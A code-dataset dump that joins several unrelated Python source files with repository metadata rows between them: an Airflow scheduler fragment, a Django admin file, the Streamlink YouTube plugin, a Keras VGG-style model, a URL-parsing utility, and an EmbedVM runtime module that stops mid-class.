# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
| 41.862351 | 130 | 0.579599 |
7d156194a0293321df3b2191953f99c068f230c7 | 170 | py | Python | manager/admin.py | Emiliemorais/ido | 5b0c8b9a3ba006c221b7768370d2593cc38d3a17 | [
"BSD-2-Clause"
] | null | null | null | manager/admin.py | Emiliemorais/ido | 5b0c8b9a3ba006c221b7768370d2593cc38d3a17 | [
"BSD-2-Clause"
] | null | null | null | manager/admin.py | Emiliemorais/ido | 5b0c8b9a3ba006c221b7768370d2593cc38d3a17 | [
"BSD-2-Clause"
] | null | null | null | from django.contrib import admin
from manager.models import Enterprise
class EnterpriseAdmin(admin.ModelAdmin):
pass
admin.site.register(Enterprise, EnterpriseAdmin) | 28.333333 | 48 | 0.835294 |
6d6e9ef0036957b658de5520d2e68b2692fb86de | 12,794 | py | Python | src/streamlink/plugins/youtube.py | Erk-/streamlink | d240704d1237fb5878960480c3f8951e0c5023b9 | [
"BSD-2-Clause"
] | 2 | 2021-03-29T12:19:06.000Z | 2021-05-06T07:08:04.000Z | resources/lib/streamlink/plugins/youtube.py | jairoxyz/script.module.streamlink_matrix | a29afed7188590595ef06decde8bfee45202cbc0 | [
"BSD-2-Clause"
] | null | null | null | resources/lib/streamlink/plugins/youtube.py | jairoxyz/script.module.streamlink_matrix | a29afed7188590595ef06decde8bfee45202cbc0 | [
"BSD-2-Clause"
] | null | null | null | import json
import logging
import re
from html import unescape
from urllib.parse import urlparse, urlunparse
from streamlink.plugin import Plugin, PluginError, pluginmatcher
from streamlink.plugin.api import useragents, validate
from streamlink.plugin.api.utils import itertags
from streamlink.stream import HLSStream, HTTPStream
from streamlink.stream.ffmpegmux import MuxedStream
from streamlink.utils import parse_json, search_dict
log = logging.getLogger(__name__)
@pluginmatcher(re.compile(r"""
https?://(?:\w+\.)?youtube\.com/
(?:
(?:
(?:
watch\?(?:.*&)*v=
|
(?P<embed>embed)/(?!live_stream)
|
v/
)(?P<video_id>[\w-]{11})
)
|
embed/live_stream\?channel=(?P<embed_live>[^/?&]+)
|
(?:c(?:hannel)?/|user/)?(?P<channel>[^/?]+)(?P<channel_live>/live)?/?$
)
|
https?://youtu\.be/(?P<video_id_short>[\w-]{11})
""", re.VERBOSE))
class YouTube(Plugin):
_re_ytInitialData = re.compile(r"""var\s+ytInitialData\s*=\s*({.*?})\s*;\s*</script>""", re.DOTALL)
_re_ytInitialPlayerResponse = re.compile(r"""var\s+ytInitialPlayerResponse\s*=\s*({.*?});\s*var\s+meta\s*=""", re.DOTALL)
_re_mime_type = re.compile(r"""^(?P<type>\w+)/(?P<container>\w+); codecs="(?P<codecs>.+)"$""")
_url_canonical = "https://www.youtube.com/watch?v={video_id}"
_url_channelid_live = "https://www.youtube.com/channel/{channel_id}/live"
# There are missing itags
adp_video = {
137: "1080p",
299: "1080p60", # HFR
264: "1440p",
308: "1440p60", # HFR
266: "2160p",
315: "2160p60", # HFR
138: "2160p",
302: "720p60", # HFR
135: "480p",
133: "240p",
160: "144p",
}
adp_audio = {
140: 128,
141: 256,
171: 128,
249: 48,
250: 64,
251: 160,
256: 256,
258: 258,
}
def __init__(self, url):
super().__init__(url)
parsed = urlparse(url)
# translate input URLs to be able to find embedded data and to avoid unnecessary HTTP redirects
if parsed.netloc == "gaming.youtube.com":
self.url = urlunparse(parsed._replace(scheme="https", netloc="www.youtube.com"))
elif self.match.group("video_id_short") is not None:
self.url = self._url_canonical.format(video_id=self.match.group("video_id_short"))
elif self.match.group("embed") is not None:
self.url = self._url_canonical.format(video_id=self.match.group("video_id"))
elif self.match.group("embed_live") is not None:
self.url = self._url_channelid_live.format(channel_id=self.match.group("embed_live"))
elif parsed.scheme != "https":
self.url = urlunparse(parsed._replace(scheme="https"))
self.author = None
self.title = None
self.session.http.headers.update({'User-Agent': useragents.CHROME})
def get_author(self):
return self.author
def get_title(self):
return self.title
@classmethod
def stream_weight(cls, stream):
match_3d = re.match(r"(\w+)_3d", stream)
match_hfr = re.match(r"(\d+p)(\d+)", stream)
if match_3d:
weight, group = Plugin.stream_weight(match_3d.group(1))
weight -= 1
group = "youtube_3d"
elif match_hfr:
weight, group = Plugin.stream_weight(match_hfr.group(1))
weight += 1
group = "high_frame_rate"
else:
weight, group = Plugin.stream_weight(stream)
return weight, group
@classmethod
def _schema_playabilitystatus(cls, data):
schema = validate.Schema(
{"playabilityStatus": {
"status": str,
validate.optional("reason"): str
}},
validate.get("playabilityStatus"),
validate.union_get("status", "reason")
)
return validate.validate(schema, data)
@classmethod
def _schema_videodetails(cls, data):
schema = validate.Schema(
{"videoDetails": {
"videoId": str,
"author": str,
"title": str,
validate.optional("isLive"): validate.transform(bool),
validate.optional("isLiveContent"): validate.transform(bool),
validate.optional("isLiveDvrEnabled"): validate.transform(bool),
validate.optional("isLowLatencyLiveStream"): validate.transform(bool),
validate.optional("isPrivate"): validate.transform(bool),
}},
validate.get("videoDetails"),
)
videoDetails = validate.validate(schema, data)
log.trace(f"videoDetails = {videoDetails!r}")
return validate.validate(
validate.union_get("videoId", "author", "title", "isLive"),
videoDetails)
@classmethod
def _schema_streamingdata(cls, data):
schema = validate.Schema(
{"streamingData": {
validate.optional("hlsManifestUrl"): str,
validate.optional("formats"): [validate.all(
{
"itag": int,
"qualityLabel": str,
validate.optional("url"): validate.url(scheme="http")
},
validate.union_get("url", "qualityLabel")
)],
validate.optional("adaptiveFormats"): [validate.all(
{
"itag": int,
"mimeType": validate.all(
str,
validate.transform(cls._re_mime_type.search),
validate.union_get("type", "codecs"),
),
validate.optional("url"): validate.url(scheme="http"),
validate.optional("qualityLabel"): str
},
validate.union_get("url", "qualityLabel", "itag", "mimeType")
)]
}},
validate.get("streamingData"),
validate.union_get("hlsManifestUrl", "formats", "adaptiveFormats")
)
hls_manifest, formats, adaptive_formats = validate.validate(schema, data)
return hls_manifest, formats or [], adaptive_formats or []
def _create_adaptive_streams(self, adaptive_formats):
streams = {}
adaptive_streams = {}
best_audio_itag = None
# Extract audio streams from the adaptive format list
for url, label, itag, mimeType in adaptive_formats:
if url is None:
continue
# extract any high quality streams only available in adaptive formats
adaptive_streams[itag] = url
stream_type, stream_codecs = mimeType
if stream_type == "audio":
streams[f"audio_{stream_codecs}"] = HTTPStream(self.session, url)
# find the best quality audio stream m4a, opus or vorbis
if best_audio_itag is None or self.adp_audio[itag] > self.adp_audio[best_audio_itag]:
best_audio_itag = itag
if best_audio_itag and adaptive_streams and MuxedStream.is_usable(self.session):
aurl = adaptive_streams[best_audio_itag]
for itag, name in self.adp_video.items():
if itag not in adaptive_streams:
continue
vurl = adaptive_streams[itag]
log.debug(f"MuxedStream: v {itag} a {best_audio_itag} = {name}")
streams[name] = MuxedStream(
self.session,
HTTPStream(self.session, vurl),
HTTPStream(self.session, aurl)
)
return streams
def _get_res(self, url):
res = self.session.http.get(url)
if urlparse(res.url).netloc == "consent.youtube.com":
c_data = {}
for _i in itertags(res.text, "input"):
if _i.attributes.get("type") == "hidden":
c_data[_i.attributes.get("name")] = unescape(_i.attributes.get("value"))
log.debug(f"c_data_keys: {', '.join(c_data.keys())}")
res = self.session.http.post("https://consent.youtube.com/s", data=c_data)
return res
@staticmethod
def _get_data_from_regex(res, regex, descr):
match = re.search(regex, res.text)
if not match:
log.debug(f"Missing {descr}")
return
return parse_json(match.group(1))
def _get_data_from_api(self, res):
_i_video_id = self.match.group("video_id")
if _i_video_id is None:
for link in itertags(res.text, "link"):
if link.attributes.get("rel") == "canonical":
try:
_i_video_id = self.matcher.match(link.attributes.get("href")).group("video_id")
except AttributeError:
return
break
else:
return
try:
_i_api_key = re.search(r'"INNERTUBE_API_KEY":\s*"([^"]+)"', res.text).group(1)
except AttributeError:
_i_api_key = "AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8"
try:
_i_version = re.search(r'"INNERTUBE_CLIENT_VERSION":\s*"([\d\.]+)"', res.text).group(1)
except AttributeError:
_i_version = "1.20210616.1.0"
res = self.session.http.post(
"https://www.youtube.com/youtubei/v1/player",
headers={"Content-Type": "application/json"},
params={"key": _i_api_key},
data=json.dumps({
"videoId": _i_video_id,
"context": {
"client": {
"clientName": "WEB_EMBEDDED_PLAYER",
"clientVersion": _i_version,
"platform": "DESKTOP",
"clientFormFactor": "UNKNOWN_FORM_FACTOR",
"browserName": "Chrome",
},
"user": {"lockedSafetyMode": "false"},
"request": {"useSsl": "true"},
}
}),
)
return parse_json(res.text)
@staticmethod
def _data_video_id(data):
if data:
for videoRenderer in search_dict(data, "videoRenderer"):
videoId = videoRenderer.get("videoId")
if videoId is not None:
return videoId
def _data_status(self, data):
if not data:
return False
status, reason = self._schema_playabilitystatus(data)
if status != "OK":
log.error(f"Could not get video info - {status}: {reason}")
return False
return True
def _get_streams(self):
res = self._get_res(self.url)
if self.match.group("channel") and not self.match.group("channel_live"):
initial = self._get_data_from_regex(res, self._re_ytInitialData, "initial data")
video_id = self._data_video_id(initial)
if video_id is None:
log.error("Could not find videoId on channel page")
return
self.url = self._url_canonical.format(video_id=video_id)
res = self._get_res(self.url)
data = self._get_data_from_regex(res, self._re_ytInitialPlayerResponse, "initial player response")
if not self._data_status(data):
data = self._get_data_from_api(res)
if not self._data_status(data):
return
video_id, self.author, self.title, is_live = self._schema_videodetails(data)
log.debug(f"Using video ID: {video_id}")
if is_live:
log.debug("This video is live.")
streams = {}
hls_manifest, formats, adaptive_formats = self._schema_streamingdata(data)
protected = next((True for url, *_ in formats + adaptive_formats if url is None), False)
if protected:
log.debug("This video may be protected.")
for url, label in formats:
if url is None:
continue
streams[label] = HTTPStream(self.session, url)
if not is_live:
streams.update(self._create_adaptive_streams(adaptive_formats))
if hls_manifest:
streams.update(HLSStream.parse_variant_playlist(self.session, hls_manifest, name_key="pixels"))
if not streams and protected:
raise PluginError("This plugin does not support protected videos, try youtube-dl instead")
return streams
__plugin__ = YouTube
| 37.300292 | 125 | 0.553619 |
20cf87c3ea8aec899dc05b715818537728bcac23 | 180 | py | Python | src/globals_consts.py | Command-Master/MCCC | a49440bfd8542002aee35d41bee093dc8b51d781 | [
"MIT"
] | 6 | 2021-01-15T03:49:01.000Z | 2021-11-02T10:43:22.000Z | src/globals_consts.py | Command-Master/MCCC | a49440bfd8542002aee35d41bee093dc8b51d781 | [
"MIT"
] | null | null | null | src/globals_consts.py | Command-Master/MCCC | a49440bfd8542002aee35d41bee093dc8b51d781 | [
"MIT"
] | null | null | null | from collections import namedtuple
NAMESPACE = 'mccc'
cname = lambda x: type(x).__name__
return_types = {}
arguments = {}
BinaryOp = namedtuple('BinaryOp', ['op', 'left', 'right']) | 30 | 58 | 0.705556 |
ed886913f87c71e5100df1dff85767a6eea7e84b | 6,465 | py | Python | citrus_pest_diseases_recognition/Bridge_VGG19.py | xingshulicc/xingshulicc | 8009b44732bf5d01cb0463146ab9f370c694af29 | [
"MIT"
] | 10 | 2018-11-27T06:38:17.000Z | 2021-10-24T02:11:58.000Z | citrus_pest_diseases_recognition/Bridge_VGG19.py | xingshulicc/xingshulicc | 8009b44732bf5d01cb0463146ab9f370c694af29 | [
"MIT"
] | 2 | 2020-04-18T06:46:11.000Z | 2021-03-04T08:00:27.000Z | citrus_pest_diseases_recognition/Bridge_VGG19.py | xingshulicc/xingshulicc | 8009b44732bf5d01cb0463146ab9f370c694af29 | [
"MIT"
] | 1 | 2020-12-29T07:41:47.000Z | 2020-12-29T07:41:47.000Z | # -*- coding: utf-8 -*-
from __future__ import print_function
"""
Created on Wed Aug 28 09:24:42 2019
@author: xingshuli
"""
from keras.layers import Conv2D
from keras.layers import Dense
from keras.layers import Activation
from keras.layers import MaxPooling2D
from keras.layers import GlobalAveragePooling2D
from keras.layers import Input
from keras.layers import Dropout
from keras.layers import BatchNormalization
from keras.layers import Concatenate
from keras import backend as K
from keras.models import Model
from keras.utils import plot_model
from keras import regularizers
weight_decay = 0.005
def _block1(inputs, filters, block):
if K.image_data_format() == 'channels_first':
bn_axis = 1
else:
bn_axis = -1
base_name = 'block' + '_' + str(block)
x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
name = base_name + '_conv_1')(inputs)
x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_1')(x)
x = Activation('relu', name = base_name + '_relu_1')(x)
x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
name = base_name + '_conv_2')(x)
x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_2')(x)
x = Activation('relu', name = base_name + '_relu_2')(x)
x = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
name = base_name + '_MaxPool')(x)
return x
def _block2(inputs, filters, block):
if K.image_data_format() == 'channels_first':
bn_axis = 1
else:
bn_axis = -1
base_name = 'block' + '_' + str(block)
x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
name = base_name + '_conv_1')(inputs)
x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_1')(x)
x = Activation('relu', name = base_name + '_relu_1')(x)
x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
name = base_name + '_conv_2')(x)
x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_2')(x)
x = Activation('relu', name = base_name + '_relu_2')(x)
x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
name = base_name + '_conv_3')(x)
x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_3')(x)
x = Activation('relu', name = base_name + '_relu_3')(x)
x = Conv2D(filters = filters, kernel_size = (3, 3), strides = (1, 1), padding = 'same',
name = base_name + '_conv_4')(x)
x = BatchNormalization(axis = bn_axis, name = base_name + '_bn_4')(x)
x = Activation('relu', name = base_name + '_relu_4')(x)
return x
def _bridge_block(inputs, filters, block):
channel_axis = 1 if K.image_data_format() == 'channels_first' else -1
base_name = 'bridge_block' + '_' + str(block)
x = Conv2D(filters = filters, kernel_size = (1, 1), strides = (1, 1), padding = 'same',
use_bias = False, kernel_regularizer = regularizers.l2(weight_decay), name = base_name + '_conv_1')(inputs)
x = BatchNormalization(axis = channel_axis, name = base_name + '_bn_1')(x)
x = Activation('relu', name = base_name + '_relu_1')(x)
x = Conv2D(filters = filters, kernel_size = (1, 1), strides = (1, 1), padding = 'same',
use_bias = False, kernel_regularizer = regularizers.l2(weight_decay), name = base_name + '_conv_2')(x)
x = BatchNormalization(axis = channel_axis, name = base_name + '_bn_2')(x)
x = Activation('relu', name = base_name + '_relu_2')(x)
return x
def Bridge_VGG(input_shape, classes):
inputs = Input(shape = input_shape)
x_1 = _block1(inputs = inputs, filters = 64, block = 1)
# The shape of x_1: 112 x 112 x 64
x_2 = _block1(inputs = x_1, filters = 128, block = 2)
# The shape of x_2: 56 x 56 x 128
x_3 = _block2(inputs = x_2, filters = 256, block = 3)
# The shape of x_3: 56 x 56 x 256
bridge_1 = Concatenate(axis = -1)([x_2, x_3])
# The shape of bridge_1: 56 x 56 x 384
bridge_2 = _bridge_block(inputs = bridge_1, filters = 256, block = 1)
# The shape of bridge_2: 56 x 56 x 256
maxpool_1 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
name = 'MaxPool_1')(x_3)
# The shape of maxpool_1: 28 x 28 x 256
bridge_pool_1 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
name = 'MaxPool_bridge_1')(bridge_2)
# The shape of bridge_pool_1: 28 x 28 x 256
x_4 = _block2(inputs = maxpool_1, filters = 512, block = 4)
# The shape of x_4: 28 x 28 x 512
bridge_3 = Concatenate(axis = -1)([bridge_pool_1, x_4])
# The shape of bridge_3: 28 x 28 x 768
bridge_4 = _bridge_block(inputs = bridge_3, filters = 512, block = 2)
# The shape of bridge_4: 28 x 28 x 512
maxpool_2 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
name = 'MaxPool_2')(x_4)
# The shape of maxpool_2: 14 x 14 x 512
bridge_pool_2 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
name = 'MaxPool_bridge_2')(bridge_4)
# The shape of bridge_pool_2: 14 x 14 x 512
x_5 = _block2(inputs = maxpool_2, filters = 512, block = 5)
# The shape of x_5: 14 x 14 x 512
bridge_5 = Concatenate(axis = -1)([bridge_pool_2, x_5])
# The shape of x_5: 14 x 14 x 1024
bridge_6 = _bridge_block(inputs = bridge_5, filters = 512, block = 3)
# The shape of x_6: 14 x 14 x 512
bridge_pool_3 = MaxPooling2D(pool_size = (2, 2), strides = (2, 2), padding = 'same',
name = 'MaxPool_bridge_3')(bridge_6)
# The shape of bridge_pool_3: 7 x 7 x 512
output = GlobalAveragePooling2D()(bridge_pool_3)
output = Dense(512, activation = 'relu', name = 'fc_1')(output)
output = Dropout(0.5)(output)
output = Dense(classes, activation = 'softmax', name = 'fc_2')(output)
model = Model(inputs = inputs, outputs = output, name = 'bridge_vgg19')
plot_model(model, to_file = 'model_bridge_vgg19.png',show_shapes = True, show_layer_names = True)
return model
| 38.482143 | 122 | 0.608198 |
f2622136e6829e17834956b82caa521de6171600 | 1,546 | py | Python | huskar_api/models/infra/utils.py | mowangdk/huskar | 7692fbc5672a5ae6e2a33616c493466a7137f8cd | [
"MIT"
] | 59 | 2019-10-31T10:50:10.000Z | 2021-11-26T04:32:25.000Z | huskar_api/models/infra/utils.py | mowangdk/huskar | 7692fbc5672a5ae6e2a33616c493466a7137f8cd | [
"MIT"
] | 5 | 2019-10-31T10:37:30.000Z | 2020-03-02T06:45:46.000Z | huskar_api/models/infra/utils.py | mowangdk/huskar | 7692fbc5672a5ae6e2a33616c493466a7137f8cd | [
"MIT"
] | 9 | 2019-10-31T10:35:00.000Z | 2019-12-01T14:13:58.000Z | from __future__ import absolute_import
import re
rfc1738_pattern = re.compile(r'''
(?P<name>[\w\+]+)://
(?:
(?P<username>[^:/]*)
(?::(?P<password>.*))?
@)?
(?:
(?:
\[(?P<ipv6host>[^/]+)\] |
(?P<ipv4host>[^/:]+)
)?
(?::(?P<port>[^/]*))?
)?
(?:/(?P<path>.*))?
''', re.X)
def parse_rfc1738_args(url):
"""Parse URL with the RFC 1738."""
m = rfc1738_pattern.match(url)
if m is None:
raise ValueError('Cannot parse RFC 1738 URL: {!r}'.format(url))
return m.groupdict()
def extract_application_name(url):
"""Parses the Sam URL and returns its application name.
:param url: The URL string.
:returns: The application name, or ``None`` if this is not a Sam URL.
"""
try:
args = parse_rfc1738_args(url)
except ValueError:
return
scheme = args['name'] or ''
if scheme.startswith('sam+'):
return args['ipv4host'] or args['ipv6host']
def extract_application_names(urls):
"""Parses the Sam URLs and returns names of valid applications.
:param urls: The list or dictionary of Sam URLs.
:returns: The list or dictionary of application names.
"""
if isinstance(urls, dict):
iterator = (
(key, extract_application_name(url))
for key, url in urls.iteritems())
return {key: name for key, name in iterator if name}
iterator = (extract_application_name(url) for url in urls)
return [name for name in iterator if name]
| 26.20339 | 73 | 0.575032 |
33440ab8f41fbb88247329030ab624d4d964475b | 15,676 | py | Python | embedvm/pysrc/embedvm/runtime.py | tcr/avrvm | d356a20ac7b413f332efdc5858bc72c2483a97ee | [
"MIT"
] | 2 | 2020-05-03T07:52:35.000Z | 2021-06-22T15:51:25.000Z | embedvm/pysrc/embedvm/runtime.py | tcr/avrvm | d356a20ac7b413f332efdc5858bc72c2483a97ee | [
"MIT"
] | null | null | null | embedvm/pysrc/embedvm/runtime.py | tcr/avrvm | d356a20ac7b413f332efdc5858bc72c2483a97ee | [
"MIT"
] | null | null | null | from .bytecode import signext, assert_signexted
from . import bytecode
from .python import CodeObject, raising_int, UnboundSetter
from .asm import DataBlock
from collections import namedtuple
import ast
from math import ceil
class Importable(CodeObject):
"""All objects that are supposed to be imported into a EVM Python program
need to subclass this to indicate that they will react properly to code
generation requests."""
class Ignore(Importable):
"""Parent class for objects that are supposed to be imported, but will only
be used in __name__ == "__main__" guarded code (that is never parsed by the
compiler)."""
def _raise(self):
raise Exception("Trying to compile ignored code.")
class ignore(Ignore):
"""Function decorator for functions that are supposed to behave like
Ignore'd objects"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **kwargs):
return self.func(*args, **kwargs)
class _UserfuncWrapper(Importable):
def __init__(self, which, func):
self.__which = which
self.__func = func
def __call__(self, *args, **kwargs):
return self.__func(*args, **kwargs)
def call(self, context, args, keywords, starargs, kwargs):
return self.PushableUserfunc(self.__which, args, keywords, starargs, kwargs)
class PushableUserfunc(Importable, namedtuple("PushableData", "which args keywords starargs kwargs")):
def push_value(self, context):
if self.keywords or self.starargs or self.kwargs:
raise Exception("Can not call wrapped user function with non-positional arguments.")
argv = self.args
real_args = argv if self.which is not None else argv[1:]
for a in real_args[::-1]:
context.append_push(a)
context.append_push(len(real_args))
if self.which is None:
which = raising_int(argv[0].n)
else:
which = self.which
context.code.append(bytecode.CallUserFunction(which))
def UserfuncWrapper(which=None):
return lambda func: _UserfuncWrapper(which, func)
class _C_Division(Importable):
"""When you need Python to behave like C with respect to divisions, write
c_division(a, b) instead of a/b. C's behavior with respect to negative
values of b will be used, as it is used in the VM."""
def __call__(self, a, b):
if a > 0 and b < 0:
return -(a/(-b))
elif a < 0 and b < 0:
return a / b
elif a < 0 and b > 0:
return -((-a)/b)
else:
return a / b
def call(self, context, args, keywords, starargs, kwargs):
if keywords or starargs or kwargs or len(args) != 2:
raise Exception("c_division requires exactly two arguments.")
return self.Pushable(args)
class Pushable(Importable):
def __init__(self, args):
self.a, self.b = args
def push_value(self, context):
context.append_push(self.a)
context.append_push(self.b)
context.code.append(bytecode.Div())
c_division = _C_Division()
class Globals(list):
"""Enhanced list of uint8 values that supports the access modes needed for
the EVM. It also supports views on global arrays and variables.
While write access to views on arrays can be implemented easily (like
``my_array = gv.array16(0); my_array[23] = 42``, a trick is employed to
implement write access single variables (assigning to which would overwrite
the binding): If something is assigned to a Globals, it is remembered in
_known_view. On later assignments, instead of re-assigning, the previously
assigned value's set function is called with the new value::
>>> gv = Globals([0]*16)
>>> gv.foo = gv.array8s(address=0)
>>> gv.bar = gv.int8s(address=8)
>>> gv.foo[7] = 10
>>> gv.bar = 9
"""
def __init__(self, *args):
super(Globals, self).__init__(*args)
self.__dict__['_known_view'] = {}
def __setattr__(self, key, value):
if key in self._known_view:
self.__dict__['_known_view'][key].set(value)
else:
self.__dict__['_known_view'][key] = value
def __getattr__(self, key):
return self.__dict__['_known_view'][key].get()
def get16(self, address):
if len(self) < address+2:
self.extend([0]*(address+2-len(self)))
return signext((self[address]<<8) + self[address+1], 0xffff)
def get8s(self, address):
if len(self) < address+1:
self.extend([0]*(address+1-len(self)))
return signext(self[address], 0xff)
def get8u(self, address):
if len(self) < address+1:
self.extend([0]*(address+1-len(self)))
return self[address]
def set16(self, address, value):
if len(self) < address+2:
self.extend([0]*(address+2-len(self)))
assert_signexted(value, 0xffff)
self[address:address+2] = divmod(value, 0x100)
def set8s(self, address, value):
if len(self) < address+1:
self.extend([0]*(address+1-len(self)))
assert_signexted(value, 0xff)
self[address] = value%256
def set8u(self, address, value):
if len(self) < address+1:
self.extend([0]*(address+1-len(self)))
self[address] = value & 0xff
array16 = lambda self, address=None, init=None, length=None: self.ArrayView16(self, address, init, length)
array8u = lambda self, address=None, init=None, length=None: self.ArrayView8u(self, address, init, length)
array8s = lambda self, address=None, init=None, length=None: self.ArrayView8s(self, address, init, length)
int16 = lambda self, address=None, init=None: self.SingleView16(self, address, init)
int8u = lambda self, address=None, init=None: self.SingleView8u(self, address, init)
int8s = lambda self, address=None, init=None: self.SingleView8s(self, address, init)
class View(object):
def __init__(self, gv, address):
self.gv = gv
self.address = address if address is not None else len(gv)
class SingleView(View):
def __init__(self, gv, address, init_value):
super(gv.SingleView, self).__init__(gv, address)
if init_value is None:
self.set(self.get()) # make sure gv is sized appropriately
else:
self.set(init_value)
class SingleView8s(SingleView):
get = lambda self: self.gv.get8s(self.address)
set = lambda self, value: self.gv.set8s(self.address, value)
class SingleView8u(SingleView):
get = lambda self: self.gv.get8u(self.address)
set = lambda self, value: self.gv.set8u(self.address, value)
class SingleView16(SingleView):
get = lambda self: self.gv.get16(self.address)
set = lambda self, value: self.gv.set16(self.address, value)
class ArrayView(View):
def __init__(self, gv, address, init_value, length):
super(gv.ArrayView, self).__init__(gv, address)
if init_value is not None:
for (i, x) in enumerate(init_value):
self[i] = x
if length is not None:
for i in range(length):
self[i] = self[i] # make sure gv is long enough
self.length = length
if length is None and init_value is None:
raise Exception("Undespecified array")
def get(self):
return self
class ArrayView8s(ArrayView):
sizeofelement = 1
__getitem__ = lambda self, index: self.gv.get8s(self.address + index)
__setitem__ = lambda self, index, value: self.gv.set8s(self.address + index, value)
class ArrayView8u(ArrayView):
sizeofelement = 1
__getitem__ = lambda self, index: self.gv.get8u(self.address + index)
__setitem__ = lambda self, index, value: self.gv.set8u(self.address + index, value)
class ArrayView16(ArrayView):
sizeofelement = 2
__getitem__ = lambda self, index: self.gv.get16(self.address + 2*index)
__setitem__ = lambda self, index, value: self.gv.set16(self.address + 2*index, value)
@classmethod
def import_to_codeobject(cls, self):
# this is a very crude hack
if cls is self:
return cls.GlobalCodeObject
else:
assert isinstance(self, cls)
ret = cls.GlobalCodeObject()
for name, view in sorted(self.__dict__['_known_view'].items(), key=lambda (k, v): v.address):
viewtype = getattr(ret, type(view).__name__) # luckily they use the same names
accessor = viewtype(ret).call(None, [ast.Num(n=view.address)], [ast.keyword('length', ast.Num(n=view.length))] if hasattr(view, 'length') else [], None, None)
ret.getattr(None, name).global_assign(accessor)
return ret
@classmethod
def _raise(self):
raise Exception("This is a live object, it can't be handled (should have be import_to_codeobject'd by now)")
class GlobalCodeObject(CodeObject, DataBlock):
def __init__(self):
self.assigned = []
self.named = {} # name -> view object
self.pos = 0
length = property(lambda self: self.pos)
@classmethod
def call(cls, context, args, keywords, starargs, kwargs):
if args or keywords or starargs or kwargs:
raise Exception("Global object can't take any arguments")
gco = cls()
context.blocks.append(gco)
return gco
def getattr(self, context, attr):
if attr in self.accessor_types:
return self.accessor_types[attr](self)
elif attr in self.named:
return self.named[attr]
else:
def assign_value(value):
self.named[attr] = value
value.pos = self.pos
if value.specified_pos is not None and value.specified_pos != value.pos:
raise Exception("Following forced memory alignment is only supported if it fits.")
self.pos += value.bytes
return UnboundSetter(assign_value)
def to_binary(self, startpos):
data = [0] * self.pos
for view in self.named.values():
view.store_initial_value(data)
return data
class View(CodeObject):
def __init__(self, gv):
self.gv = gv
def call(self, context, args, keywords, starargs, kwargs):
if starargs or kwargs:
raise Exception("Can't handle those arguments")
if len(args) not in (0, 1) or len(args) == 1 and not isinstance(args[0], ast.Num):
raise Exception("Can't handle those arguments")
if args:
self.specified_pos = raising_int(args[0].n)
else:
self.specified_pos = None
keywords_converted = {}
for k in keywords:
keywords_converted[k.arg] = ast.literal_eval(k.value)
self.init = keywords_converted.pop('init', None)
if 'length' in keywords_converted:
self.length = keywords_converted.pop('length', None)
if self.length is None and self.init is None:
raise Exception("Global variable is underspecified.")
if self.length is None: # never happens for arrays
self.length = len(self.init)
self.bytes = self.length * self.bytes_per_item
return self
class SingleView(View):
length = 1
def pop_set(self, context):
context.code.append(self.store_code(address=self.pos, nargs=1 if self.pos < 256 else 2, popoffset=False))
def push_value(self, context):
context.code.append(self.load_code(address=self.pos, nargs=1 if self.pos < 256 else 2, popoffset=False))
class ArrayView(View):
length = None
def getslice(self, context, slice):
return self.SliceView(self, slice)
class SliceView(CodeObject):
def __init__(self, array, slice):
self.array = array
if not isinstance(slice, ast.Index):
raise Exception("Can not deal with non-index slice.")
self.slice = slice.value
def pop_set(self, context):
context.append_push(self.slice)
context.code.append(self.array.store_code(address=self.array.pos, nargs=1 if self.array.pos < 256 else 2, popoffset=True))
def push_value(self, context):
context.append_push(self.slice)
context.code.append(self.array.load_code(address=self.array.pos, nargs=1 if self.array.pos < 256 else 2, popoffset=True))
class SingleView8s(SingleView):
bytes_per_item = 1
store_code = bytecode.GlobalStoreS8
load_code = bytecode.GlobalLoadS8
def store_initial_value(self, list):
if self.init is not None:
list[self.pos] = self.init % 256
class SingleView8u(SingleView):
bytes_per_item = 1
store_code = bytecode.GlobalStoreU8
load_code = bytecode.GlobalLoadU8
def store_initial_value(self, list):
if self.init is not None:
list[self.pos] = self.init % 256
class SingleView16(SingleView):
bytes_per_item = 2
store_code = bytecode.GlobalStore16
load_code = bytecode.GlobalLoad16
def store_initial_value(self, list):
if self.init is not None:
a, b = divmod(self.init, 0x100)
a = a % 0x100
list[self.pos:self.pos+2] = a, b
class ArrayView8s(ArrayView):
bytes_per_item = 1
store_code = bytecode.GlobalStoreS8
load_code = bytecode.GlobalLoadS8
def store_initial_value(self, list):
if self.init is not None:
for (i, v) in enumerate(self.init):
list[self.pos + i] = v % 256
class ArrayView8u(ArrayView):
bytes_per_item = 1
store_code = bytecode.GlobalStoreU8
